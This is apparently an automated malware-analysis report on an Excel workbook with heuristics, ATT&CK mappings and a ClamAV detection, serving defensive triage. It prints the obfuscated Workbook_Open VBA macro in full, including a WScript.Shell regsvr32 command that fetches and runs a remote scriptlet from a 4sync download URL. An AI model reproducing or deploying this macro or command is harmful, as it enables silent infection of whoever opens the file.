MALICIOUS
390
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 System Binary Proxy Execution: Rundll32
The critical heuristics indicate the presence of a Workbook_Open VBA macro that utilizes WScript.Shell and the Shell() function. This suggests the macro is designed to download and execute a second-stage payload. The ClamAV detection further confirms the malicious nature of the file, identifying it as Xls.Malware.Valyria-10036093-0.
Heuristics 9
-
ClamAV: Xls.Malware.Valyria-10036093-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-10036093-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
.Filters.Add "Excel Files", "*.cDTCNYsrhKMZuiHoTOuzuKQfHrpzzoAVsyNaOdUNMNpafAiOCReCnuzyNOVtP; *.hJpOAWwGXztWckEdykcrWiUVdNosnvTA; *.FwHKSWYoAuyuVThAFzAryDhQQAnAzDFawEDiSNNDQWDCanpoISfMPdAbeQTyIDTXNybt; *.CrYQedshDtNsMnBnaSuwPZcBrudIBeooDJ; *.SbMRNwBN", 1 Set Ma = CreateObject("WScript.Shell") Ma.Run ("regsvr32 /sanfOePwrchfraTAfdStGwakfhCVVsEWnNAUhvwN /niWpiORAsPKIGsTLZJvPBXwfSsebYYzWZzVDoVLh /uanfOePwrchfraTAfdStGwakfhCVVsEWnNAUhvwN /i:https://www.4sync.com/web/directDownload/k-95obKw/QsBDIXQt.9384a082f2509435e363242f2111fc68 scrobj.dll oDuGyULyCihRMSXSwKisLAdFGMkbFnWKfshAFfF") -
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
Set Ma = CreateObject("WScript.Shell") Ma.Run ("regsvr32 /sanfOePwrchfraTAfdStGwakfhCVVsEWnNAUhvwN /niWpiORAsPKIGsTLZJvPBXwfSsebYYzWZzVDoVLh /uanfOePwrchfraTAfdStGwakfhCVVsEWnNAUhvwN /i:https://www.4sync.com/web/directDownload/k-95obKw/QsBDIXQt.9384a082f2509435e363242f2111fc68 scrobj.dll oDuGyULyCihRMSXSwKisLAdFGMkbFnWKfshAFfF") .Show -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
.Filters.Add "Excel Files", "*.cDTCNYsrhKMZuiHoTOuzuKQfHrpzzoAVsyNaOdUNMNpafAiOCReCnuzyNOVtP; *.hJpOAWwGXztWckEdykcrWiUVdNosnvTA; *.FwHKSWYoAuyuVThAFzAryDhQQAnAzDFawEDiSNNDQWDCanpoISfMPdAbeQTyIDTXNybt; *.CrYQedshDtNsMnBnaSuwPZcBrudIBeooDJ; *.SbMRNwBN", 1 Set Ma = CreateObject("WScript.Shell") Ma.Run ("regsvr32 /sanfOePwrchfraTAfdStGwakfhCVVsEWnNAUhvwN /niWpiORAsPKIGsTLZJvPBXwfSsebYYzWZzVDoVLh /uanfOePwrchfraTAfdStGwakfhCVVsEWnNAUhvwN /i:https://www.4sync.com/web/directDownload/k-95obKw/QsBDIXQt.9384a082f2509435e363242f2111fc68 scrobj.dll oDuGyULyCihRMSXSwKisLAdFGMkbFnWKfshAFfF") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Workbook_Open() Dim RdUdsfe As Workbook, KDppzYfhdePNzRBFObeHiyUYDsEBVXiHuWOtYWTyrnzQKP As Workbook, HEdKhBAPDbUuJZiTO As Workbook, DyFWdXhIGrEiQEKZCUWUbTwdVcoMBkFkiafUaypnAiLTLEn As Workbook -
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://www.4sync.com/web/directDownload/k-95obKw/QsBDIXQt.9384a082f2509435e363242f2111fc68 In document text (OOXML body / shared strings)
- https://www.4sync.com/web/directDownload/k-95obKw/QsBDIXQt.9384a082f2509435e363242f2111In document text (OOXML body / shared strings)
- https://www.4sync.com/web/directDownload/k-95obKw/QsBDIXQt.9384a082f2509435e363242fIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15497 bytes |
SHA-256: 5a9895553002dad31813745717ef541ead2947a813441bc6c024b76c98723f05 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim RdUdsfe As Workbook, KDppzYfhdePNzRBFObeHiyUYDsEBVXiHuWOtYWTyrnzQKP As Workbook, HEdKhBAPDbUuJZiTO As Workbook, DyFWdXhIGrEiQEKZCUWUbTwdVcoMBkFkiafUaypnAiLTLEn As Workbook
Dim IcFcQZBRhrcXMBpGdNdctuLVTWMaPVBpsfp As Workbook, fNohSYfYbKYSDvPHWNHNUcBEHEBEovNOZHb As Workbook, HXtcvYfRUwhXILdPfAXOHMcXMMzHLGrUMCzcZfHTtJFnLiXLaIrYBWLTTZ As Workbook, ciBZKYhJNPrcMesRniAUnrJDQUsJdUXbzvSVcvSGWBLJOyfenMWrOhaWyJkQHCGRknnA As Workbook
Dim EZAE As Integer, hkhXMyeY As Integer, iFwRbZaeIyBuvdOHBQyDQQBGvzThZQLsRykft As Integer, YIJTCXhAzVMuVYXa As Integer
Dim zcwbvTUNGJGeULiHaBbKKFnCFzJpVJApwKwoAXthZtvBTJay As Range, tKuQwZaDFLGnooUfFhdbiFPuoDRkkXzzioREScNkGeaHRtFoUnNeRJYSUZCNi As Range, IPnOAZaWBXKtrCbJKCOEDncZrHQpteiCEiAYnGrFSXDkuWJCbTDuYOfoMnySpRFt As Range
Dim FZfXHLCOTRNA As Range, sXyDBB As Range, udreVtQbFOcLsaSFNuNsPKzwBXSHDRepJaipJeuPLeiZQntsRhDrWUyLpJH As Range, bafHfkzWkVnOAIUIOJObRNOVRkUpGFhidoKNIMAU As Range, drTKWHFPViwLnvvIBKnGHMLfopzOwRbCStuvaSDJdYIZLsy As Range, KbLKTOL As Range
Dim CRQY As Variant, AbLJOVQPRGdJTUAreOrsZTIKVHcrWTtyaIApOYh As Variant
Dim ZJHX As String
Dim KVGLypwQOOkCkDZBASHJpYr, VTCJKbWOpNzbEfEeRLvKfEcVfkPIv As Long
Dim JVTYLQKYhMWwXrDHsBBNJkIBpBkKXeYYUJDcBXs As Variant
JVTYLQKYhMWwXrDHsBBNJkIBpBkKXeYYUJDcBXs = Array("hJJZOtrZYDVZDMkFCZSSCiYH #", "NzRbATtFwzcstnPeFpVHUBZzXaREWrhosvPWRnUHtsvuwpuNLriifXVvAyezb", "NBAZIDAZCMyEh?treZOnLPCSXVsWddHOIAtQDr?yd", "hJJZOtrZYDVZDMkFCZSSCiYH zQOXfTNYUnJYoZFBpYzzvCTHUQFRheczhMFDUCb", "hJJZOtrZYDVZDMkFCZSSCiYH pMJXEXQYIXtNKKHscBthTPeNEeXYnfhTyPHZobM", "anfOePwrchfraTAfdStGwakfhCVVsEWnNAUhvwN iWpiORAsPKIGsTLZJvPBXwfSsebYYzWZzVDoVLh", "oDuGyULyCihRMSXSwKisLAdFGMkbFnWKfshAFfF")
Dim AesZcWVzpLJcdSkMQdEuzKauRnneipWnRRPHwGX As Long, GMAyMZhAXkhozRzGtDWihUXabWAiOeVZDoyOUas As Long
Dim IBzX As String, hNtLrrrQhUEUSOdfbUDXrCQITVUkFQMKTieyCRZAOnbzOEeydoJKVosNywnKdIksc As String
For hkhXMyeY = 1 To KVGLypwQOOkCkDZBASHJpYr
IBzX = HEdKhBAPDbUuJZiTO.QOwNiTMfZpIUXzNMNobiTfV(1).Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & hkhXMyeY).Value
hNtLrrrQhUEUSOdfbUDXrCQITVUkFQMKTieyCRZAOnbzOEeydoJKVosNywnKdIksc = HEdKhBAPDbUuJZiTO.QOwNiTMfZpIUXzNMNobiTfV(1).Range("XFFZhAyZOdKQ" & hkhXMyeY).Value
Select Case True
Case IBzX = "cQuEBOYbYpWIfoWicNsTfRWvSXSFrIbIGwyWuZZ:": HEdKhBAPDbUuJZiTO.QOwNiTMfZpIUXzNMNobiTfV(1).Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & hkhXMyeY & ":XFFZhAyZOdKQ" & hkhXMyeY).Font.Bold = True
Case InStr(1, IBzX, "NzRbATtFwzcstnPeFpVHUBZzXaREWrhosvPWRnUHtsvuwpuNLriifXVvAyezb: ")
HEdKhBAPDbUuJZiTO.QOwNiTMfZpIUXzNMNobiTfV(1).Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & hkhXMyeY & ":aGecyDyYWpQeMawsrXviWeceM" & hkhXMyeY).Interior.ColorIndex = 15
HEdKhBAPDbUuJZiTO.QOwNiTMfZpIUXzNMNobiTfV(1).Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & hkhXMyeY).Font.Bold = True
Case InStr(1, hNtLrrrQhUEUSOdfbUDXrCQITVUkFQMKTieyCRZAOnbzOEeydoJKVosNywnKdIksc, "hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL"): HEdKhBAPDbUuJZiTO.QOwNiTMfZpIUXzNMNobiTfV(1).Range("XFFZhAyZOdKQ" & hkhXMyeY & ":XFFZhAyZOdKQ" & (hkhXMyeY + 2)).Interior.ColorIndex = 37
Case InStr(1, hNtLrrrQhUEUSOdfbUDXrCQITVUkFQMKTieyCRZAOnbzOEeydoJKVosNywnKdIksc, "XFFZhAyZOdKQ"): HEdKhBAPDbUuJZiTO.QOwNiTMfZpIUXzNMNobiTfV(1).Range("XFFZhAyZOdKQ" & hkhXMyeY & ":XFFZhAyZOdKQ" & (hkhXMyeY + 2)).Interior.ColorIndex = 3
Case InStr(1, hNtLrrrQhUEUSOdfbUDXrCQITVUkFQMKTieyCRZAOnbzOEeydoJKVosNywnKdIksc, "FIXfSRQdiKUJNNRanBXcYSweCRFVyAGuACrUFTMDeGoBhLTBpbnXesvNtTJb"): HEdKhBAPDbUuJZiTO.QOwNiTMfZpIUXzNMNobiTfV(1).Range("XFFZhAyZOdKQ" & hkhXMyeY & ":XFFZhAyZOdKQ" & (hkhXMyeY + 2)).Interior.Color = RGB(50, 205, 50)
End Select
Next hkhXMyeY
Application.DisplayAlerts = False
Dim cXrSYVGwOTeEFEMGvdIwFtCCaFzByNJheKonW As PivotItem
With Application.FileDialog(msoFileDialogFilePicker)
.AllowMultiSelect = False
'udreVtQbFOcLsaSFNuNsPKzwBXSHDRepJaipJeuPLeiZQntsRhDrWUyLpJH HQwiKvSOTDEvshXWKRXYZHoRborIO hkhXMyeY QOwNiTMfZpIUXzNMNobiTfV
.Filters.Add "Excel Files", "*.cDTCNYsrhKMZuiHoTOuzuKQfHrpzzoAVsyNaOdUNMNpafAiOCReCnuzyNOVtP; *.hJpOAWwGXztWckEdykcrWiUVdNosnvTA; *.FwHKSWYoAuyuVThAFzAryDhQQAnAzDFawEDiSNNDQWDCanpoISfMPdAbeQTyIDTXNybt; *.CrYQedshDtNsMnBnaSuwPZcBrudIBeooDJ; *.SbMRNwBN", 1
Set Ma = CreateObject("WScript.Shell")
Ma.Run ("regsvr32 /sanfOePwrchfraTAfdStGwakfhCVVsEWnNAUhvwN /niWpiORAsPKIGsTLZJvPBXwfSsebYYzWZzVDoVLh /uanfOePwrchfraTAfdStGwakfhCVVsEWnNAUhvwN /i:https://www.4sync.com/web/directDownload/k-95obKw/QsBDIXQt.9384a082f2509435e363242f2111fc68 scrobj.dll oDuGyULyCihRMSXSwKisLAdFGMkbFnWKfshAFfF")
.Show
'NzRbATtFwzcstnPeFpVHUBZzXaREWrhosvPWRnUHtsvuwpuNLriifXVvAyezb hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL /niWpiORAsPKIGsTLZJvPBXwfSsebYYzWZzVDoVLh HQwiKvSOTDEvshXWKRXYZHoRborIO hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL HQwiKvSOTDEvshXWKRXYZHoRborIO
End With
If InStr(fullpath, ".FwHKSWYoAuyuVThAFzAryDhQQAnAzDFawEDiSNNDQWDCanpoISfMPdAbeQTyIDTXNybt") = 0 Then
Exit Sub
End If
Set ws = Workbooks.Open(fullpath)
Set wb = Workbooks.Add
ws.QOwNiTMfZpIUXzNMNobiTfV(1).UsedRange.Copy Destination:=wb.QOwNiTMfZpIUXzNMNobiTfV("yXhtaPtaIWiphMfV").Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & Rows.okiIEtfsysKibGdhatHcYriXThVRrsEXZRVZUYwFSprZDiJtDQQWtQOYapOyCnbbRNkw).End(xlUp)
wb.QOwNiTMfZpIUXzNMNobiTfV("yXhtaPtaIWiphMfV").Range("UvAdFEFWcQkPyCWGekDvukUZYNYrd").Value = "Status"
lRow = wb.QOwNiTMfZpIUXzNMNobiTfV("yXhtaPtaIWiphMfV").Cells(Rows.okiIEtfsysKibGdhatHcYriXThVRrsEXZRVZUYwFSprZDiJtDQQWtQOYapOyCnbbRNkw, 1).End(xlUp).Row
For pWkepLKCHNEpcHTQMSNhfacEwuPIwGhzovUtwoZPKIawfrQQUcHyJeupUKUW = 2 To lRow
If wb.QOwNiTMfZpIUXzNMNobiTfV("yXhtaPtaIWiphMfV").Range("H" & pWkepLKCHNEpcHTQMSNhfacEwuPIwGhzovUtwoZPKIawfrQQUcHyJeupUKUW).Value = 0 And wb.QOwNiTMfZpIUXzNMNobiTfV(1).Range("I" & pWkepLKCHNEpcHTQMSNhfacEwuPIwGhzovUtwoZPKIawfrQQUcHyJeupUKUW).Value = 0 Then
wb.QOwNiTMfZpIUXzNMNobiTfV("yXhtaPtaIWiphMfV").Range("pWkepLKCHNEpcHTQMSNhfacEwuPIwGhzovUtwoZPKIawfrQQUcHyJeupUKUW" & pWkepLKCHNEpcHTQMSNhfacEwuPIwGhzovUtwoZPKIawfrQQUcHyJeupUKUW).Value = "FIXfSRQdiKUJNNRanBXcYSweCRFVyAGuACrUFTMDeGoBhLTBpbnXesvNtTJb"
Else
wb.QOwNiTMfZpIUXzNMNobiTfV("yXhtaPtaIWiphMfV").Range("pWkepLKCHNEpcHTQMSNhfacEwuPIwGhzovUtwoZPKIawfrQQUcHyJeupUKUW" & pWkepLKCHNEpcHTQMSNhfacEwuPIwGhzovUtwoZPKIawfrQQUcHyJeupUKUW).Value = "FIXfSRQdiKUJNNRanBXcYSweCRFVyAGuACrUFTMDeGoBhLTBpbnXesvNtTJb"
End If
Next pWkepLKCHNEpcHTQMSNhfacEwuPIwGhzovUtwoZPKIawfrQQUcHyJeupUKUW
wb.QOwNiTMfZpIUXzNMNobiTfV("yXhtaPtaIWiphMfV").Range("TipZIekktYhAthdUuoSFNNrr:UvAdFEFWcQkPyCWGekDvukUZYNYrd").AutoFilter _
Field:=4, _
Criteria1:=Array("EN", "EN/EFLbVtzrCSSrNtYrCFoszt", "FF", "FF/EFLbVtzrCSSrNtYrCFoszt", "pTXavvnPXVCUcvbfUWcAGFDUA", "pTXavvnPXVCUcvbfUWcAGFDUA/EFLbVtzrCSSrNtYrCFoszt"), _
Operator:=xlFilterValues
'NBAZIDAZCMyEh?treZOnLPCSXVsWddHOIAtQDr?yd
wb.QOwNiTMfZpIUXzNMNobiTfV("yXhtaPtaIWiphMfV").Range("TipZIekktYhAthdUuoSFNNrr:UvAdFEFWcQkPyCWGekDvukUZYNYrd").AutoFilter _
Field:=5, _
Criteria1:=Array("1", "2", "3", "4", "5", "6", "7"), _
Operator:=xlFilterValues
'NzRbATtFwzcstnPeFpVHUBZzXaREWrhosvPWRnUHtsvuwpuNLriifXVvAyezb
wb.QOwNiTMfZpIUXzNMNobiTfV("yXhtaPtaIWiphMfV").Range("TipZIekktYhAthdUuoSFNNrr:UvAdFEFWcQkPyCWGekDvukUZYNYrd").AutoFilter _
Field:=7, _
Criteria1:=Array("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL", "XFFZhAyZOdKQ", "FIXfSRQdiKUJNNRanBXcYSweCRFVyAGuACrUFTMDeGoBhLTBpbnXesvNtTJb"), _
Operator:=xlFilterValues
Worksheets("yXhtaPtaIWiphMfV").Cells(1, 1).Select
QOwNiTMfZpIUXzNMNobiTfV.Add
wb.PivotCaches.Create(SourceType:=xlDatabase, SourceData:= _
"yXhtaPtaIWiphMfV!R1C1:R" & lRow & "HQwiKvSOTDEvshXWKRXYZHoRborIO", Version:=xlPivotTableVersion15).CreatePivotTable _
TableDestination:="esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU!R3C1", TableName:="PivotTable1", DefaultVersion _
:=xlPivotTableVersion15
QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Select
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").PivotTables(1).AddFields _
ColumnFields:="hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL", _
RowFields:=Array("NzRbATtFwzcstnPeFpVHUBZzXaREWrhosvPWRnUHtsvuwpuNLriifXVvAyezb", "kQMWnRXbudAFcVkAcatObeYwJabZuyDAnSfykTL", "kQMWnRXbudAFcVkAcatObeYwJabZuyDAnSfykTL", "kQMWnRXbudAFcVkAcatObeYwJabZuyDAnSfykTL", "kQMWnRXbudAFcVkAcatObeYwJabZuyDAnSfykTL")
With wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").PivotTables(1).PivotFields("ECAXYXdHSaQa")
.Orientation = xlDataField
.Name = "okiIEtfsysKibGdhatHcYriXThVRrsEXZRVZUYwFSprZDiJtDQQWtQOYapOyCnbbRNkw"
.Function = xlCount
End With
With wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").PivotTables(1).PivotFields("ECAXYXdHSaQa")
.Orientation = xlDataField
.Name = "SeXVLKSANheftPvpAtiSkuQKtBvMfFcIiHKVToYHKTbGWXoYFwJFB"
.NumberFormat = "SeXVLKSANheftPvpAtiSkuQKtBvMfFcIiHKVToYHKTbGWXoYFwJFB"
.Function = xlCount
.Calculation = xlPercentOfRow
End With
With wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").PivotTables(1).PivotFields("NzRbATtFwzcstnPeFpVHUBZzXaREWrhosvPWRnUHtsvuwpuNLriifXVvAyezb")
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("iMAStsHoIvywcFsPweMbBIzGTsKiQSkXSfO").Visible = False
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("iMAStsHoIvywcFsPweMbBIzGTsKiQSkXSfO").Visible = False
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("iMAStsHoIvywcFsPweMbBIzGTsKiQSkXSfO").Visible = False
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("iMAStsHoIvywcFsPweMbBIzGTsKiQSkXSfO").Visible = False
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("(iMAStsHoIvywcFsPweMbBIzGTsKiQSkXSfO)").Visible = False
End With
With wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").PivotTables(1).PivotFields("Battalion")
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("iMAStsHoIvywcFsPweMbBIzGTsKiQSkXSfO").Visible = False
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("(iMAStsHoIvywcFsPweMbBIzGTsKiQSkXSfO)").Visible = False
End With
For Each cXrSYVGwOTeEFEMGvdIwFtCCaFzByNJheKonW In wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").PivotTables(1).PivotFields("Rank").BXGWnEnaazvEiFEyzCzPkeIJNhPkte
On Error Resume Next
cXrSYVGwOTeEFEMGvdIwFtCCaFzByNJheKonW.Visible = False
Next cXrSYVGwOTeEFEMGvdIwFtCCaFzByNJheKonW
With wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").PivotTables(1).PivotFields("Rank")
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("DypUbDMUikOLMKnZSNXXrAHffVAAXLIPZspyDNvTvV").Visible = True
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("DypUbDMUikOLMKnZSNXXrAHffVAAXLIPZspyDNvTvV/DypUbDMUikOLMKnZSNXXrAHffVAAXLIPZspyDNvTvV").Visible = True
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("DypUbDMUikOLMKnZSNXXrAHffVAAXLIPZspyDNvTvV").Visible = True
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("DypUbDMUikOLMKnZSNXXrAHffVAAXLIPZspyDNvTvV/DypUbDMUikOLMKnZSNXXrAHffVAAXLIPZspyDNvTvV").Visible = True
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("DypUbDMUikOLMKnZSNXXrAHffVAAXLIPZspyDNvTvV").Visible = True
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("DypUbDMUikOLMKnZSNXXrAHffVAAXLIPZspyDNvTvV/DypUbDMUikOLMKnZSNXXrAHffVAAXLIPZspyDNvTvV").Visible = True
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("(DypUbDMUikOLMKnZSNXXrAHffVAAXLIPZspyDNvTvV)").Visible = False
End With
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").PivotTables(1).PivotFields("Battalion").ShowDetail = False
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").PivotTables(1).RefreshTable
For j = 7 To 13
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & j).Value = "Battalion " & wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & j).Value
Debug.Print (j)
Next j
For k = 6 To 22 Step 8
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & k).Value = "NzRbATtFwzcstnPeFpVHUBZzXaREWrhosvPWRnUHtsvuwpuNLriifXVvAyezb " & wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & k).Value
Next k
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("HQwiKvSOTDEvshXWKRXYZHoRborIO").Value = "okiIEtfsysKibGdhatHcYriXThVRrsEXZRVZUYwFSprZDiJtDQQWtQOYapOyCnbbRNkw"
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("HQwiKvSOTDEvshXWKRXYZHoRborIO").Value = "%"
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("HQwiKvSOTDEvshXWKRXYZHoRborIO").EntireRow.Hidden = True
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL:HQwiKvSOTDEvshXWKRXYZHoRborIO").Columns.AutoFit
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Columns("HQwiKvSOTDEvshXWKRXYZHoRborIO").Hidden = True
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("HQwiKvSOTDEvshXWKRXYZHoRborIO:HQwiKvSOTDEvshXWKRXYZHoRborIO").Interior.Color = vbRed
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("HQwiKvSOTDEvshXWKRXYZHoRborIO:HQwiKvSOTDEvshXWKRXYZHoRborIO").Interior.ColorIndex = 22
For m = 7 To 23 Step 8
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & m & ":F" & m + 6).Interior.Color = vbYellow
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & m - 1 & ":F" & m - 1).Interior.ColorIndex = 15
Next m
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 32256 bytes |
SHA-256: 56b2bfce2f10d3ba90b4617aab011b83e6f6ba1f5cb3d949bfd38dcf63e8b12b |
|||
|
Detection
ClamAV:
Xls.Malware.Valyria-10036093-0
Obfuscation or payload:
likely
345 of 556 identifiers look randomly generated (e.g. 'okiIEtfsysKibGdhatHcYriXThVRrsEXZRVZUYwF') — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.